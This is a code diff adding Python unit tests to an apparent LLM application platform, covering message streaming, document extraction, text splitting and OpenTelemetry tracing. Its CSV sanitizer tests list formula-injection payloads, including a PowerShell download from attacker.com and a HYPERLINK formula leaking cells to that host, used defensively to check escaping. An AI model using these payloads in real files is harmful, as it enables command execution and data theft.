+ + # Verify calls to message_to_stream_response + assert mock_message_cycle_manager.message_to_stream_response.call_count == 2 + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer="Hello", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + mock_message_cycle_manager.message_to_stream_response.assert_any_call( + answer=" world!", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) diff --git a/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py new file mode 100644 index 0000000000..5ef7f0d7f4 --- /dev/null +++ b/api/tests/unit_tests/core/app/task_pipeline/test_message_cycle_manager_optimization.py @@ -0,0 +1,166 @@ +"""Unit tests for the message cycle manager optimization.""" + +from types import SimpleNamespace +from unittest.mock import ANY, Mock, patch + +import pytest +from flask import current_app + +from core.app.entities.task_entities import MessageStreamResponse, StreamEvent +from core.app.task_pipeline.message_cycle_manager import MessageCycleManager + + +class TestMessageCycleManagerOptimization: + """Test cases for the message cycle manager optimization that prevents N+1 queries.""" + + @pytest.fixture + def mock_application_generate_entity(self): + """Create a mock application generate entity.""" + entity = Mock() + entity.task_id = "test-task-id" + return entity + + @pytest.fixture + def message_cycle_manager(self, mock_application_generate_entity): + """Create a message cycle manager instance.""" + task_state = Mock() + return MessageCycleManager(application_generate_entity=mock_application_generate_entity, task_state=task_state) + + def test_get_message_event_type_with_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE_FILE when message has files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as 
mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_get_message_event_type_without_message_file(self, message_cycle_manager): + """Test get_message_event_type returns MESSAGE when message has no files.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and no message file + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None + + # Execute + with current_app.app_context(): + result = message_cycle_manager.get_message_event_type("test-message-id") + + # Assert + assert result == StreamEvent.MESSAGE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_precomputed_event_type(self, message_cycle_manager): + """MessageCycleManager.message_to_stream_response expects a valid event_type; callers should precompute it.""" + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + # Setup mock session and message file + mock_session = Mock() + 
mock_session_class.return_value.__enter__.return_value = mock_session + + mock_message_file = Mock() + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = mock_message_file + + # Execute: compute event type once, then pass to message_to_stream_response + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=event_type + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE_FILE + mock_session.query.return_value.scalar.assert_called_once() + + def test_message_to_stream_response_with_event_type_skips_query(self, message_cycle_manager): + """Test that message_to_stream_response skips database query when event_type is provided.""" + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + # Execute with event_type provided + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE + # Should not query database when event_type is provided + mock_session_class.assert_not_called() + + def test_message_to_stream_response_with_from_variable_selector(self, message_cycle_manager): + """Test message_to_stream_response with from_variable_selector parameter.""" + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", + message_id="test-message-id", + from_variable_selector=["var1", "var2"], + event_type=StreamEvent.MESSAGE, + ) + + assert isinstance(result, 
MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.from_variable_selector == ["var1", "var2"] + assert result.event == StreamEvent.MESSAGE + + def test_optimization_usage_example(self, message_cycle_manager): + """Test the optimization pattern that should be used by callers.""" + # Step 1: Get event type once (this queries database) + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None # No files + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + + # Should query database once + mock_session_class.assert_called_once_with(ANY, expire_on_commit=False) + assert event_type == StreamEvent.MESSAGE + + # Step 2: Use event_type for multiple calls (no additional queries) + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + mock_session_class.return_value.__enter__.return_value = Mock() + + chunk1_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 1", message_id="test-message-id", event_type=event_type + ) + + chunk2_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 2", message_id="test-message-id", event_type=event_type + ) + + # Should not query database again + mock_session_class.assert_not_called() + + assert chunk1_response.event == StreamEvent.MESSAGE + assert chunk2_response.event == StreamEvent.MESSAGE + assert chunk1_response.answer == "Chunk 1" + assert chunk2_response.answer == "Chunk 2" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py 
b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def 
test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + 
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == 
f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " diff --git a/api/tests/unit_tests/core/rag/extractor/test_helpers.py b/api/tests/unit_tests/core/rag/extractor/test_helpers.py new file mode 100644 index 0000000000..edf8735e57 --- /dev/null +++ b/api/tests/unit_tests/core/rag/extractor/test_helpers.py @@ -0,0 +1,10 @@ +import tempfile + +from core.rag.extractor.helpers import FileEncoding, detect_file_encodings + + +def test_detect_file_encodings() -> None: + with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as temp: + temp.write("Shared data") + temp_path = temp.name + assert detect_file_encodings(temp_path) == [FileEncoding(encoding="utf_8", confidence=0.0, language="Unknown")] diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..fd0b0e2e44 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,85 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): 
assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, 
target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True diff --git a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py index 7d246ac3cc..943a9e5712 100644 --- a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py +++ b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py @@ -901,6 +901,13 @@ class TestFixedRecursiveCharacterTextSplitter: # Verify no empty chunks assert all(len(chunk) > 0 for chunk in result) + def test_double_slash_n(self): + data = "chunk 1\n\nsubchunk 1.\nsubchunk 2.\n\n---\n\nchunk 2\n\nsubchunk 1\nsubchunk 2." 
+ separator = "\\n\\n---\\n\\n" + splitter = FixedRecursiveCharacterTextSplitter(fixed_separator=separator) + chunks = splitter.split_text(data) + assert chunks == ["chunk 1\n\nsubchunk 1.\nsubchunk 2.", "chunk 2\n\nsubchunk 1\nsubchunk 2."] + # ============================================================================ # Test Metadata Preservation diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta 
contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. 
+""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + 
provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. 
+ +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and 
ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, 
tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 
+ + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + 
